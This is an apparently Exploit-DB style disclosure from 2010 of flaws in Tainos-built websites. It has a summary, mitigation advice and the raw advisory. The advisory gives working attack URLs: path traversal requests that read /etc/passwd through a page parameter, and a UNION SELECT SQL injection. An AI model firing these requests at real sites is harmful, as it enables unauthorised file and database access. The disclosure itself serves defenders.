Tainos Multiple Vulnerabilities

vendor:

Tainos

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Local File Include Vulnerability, SQL Injection Vulnerability, Cross Site Scripting Vulnerability

79, 89, 79

CWE

Product Name: Tainos

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Tainos Multiple Vulnerabilities

Local File Include Vulnerability: A vulnerability in Tainos web design allows an attacker to include a file from the local system. This can be exploited to gain access to sensitive information such as passwords. SQL Injection Vulnerability: A vulnerability in Tainos web design allows an attacker to inject arbitrary SQL commands into a vulnerable web application. This can be exploited to gain access to sensitive information such as passwords. Cross Site Scripting Vulnerability: A vulnerability in Tainos web design allows an attacker to inject arbitrary JavaScript code into a vulnerable web application. This can be exploited to gain access to sensitive information such as passwords.

Mitigation:

To mitigate the risk of Local File Include Vulnerability, ensure that user input is properly sanitized and validated. To mitigate the risk of SQL Injection Vulnerability, use parameterized queries and stored procedures. To mitigate the risk of Cross Site Scripting Vulnerability, use a web application firewall and input validation.

Source

Exploit-DB raw data:

=======================================================
Tainos Multiple Vulnerabilities
=======================================================
########################################
# Name: Tainos Multiple Vulnerabilities
# Vendor: www.tainos-webdesign.com
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Local File Include Vulnerability:

[+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI]

[+] Example: http://[site]/index_offer.php?page=../../../../../../../../../../etc/passwd

[+] Example: http://[site]/nederlands/tours.php?page=../../../../../../../../../../etc/passwd

########################################

########################################
[+] SQL Injection Vulnerability:

[+] Vulnerability: /www.site.com/index.php?id=[SQLi]

[+] Example: http://[site]/index.php?id=-9999+union+all+select+1,2,@@version,4,5

########################################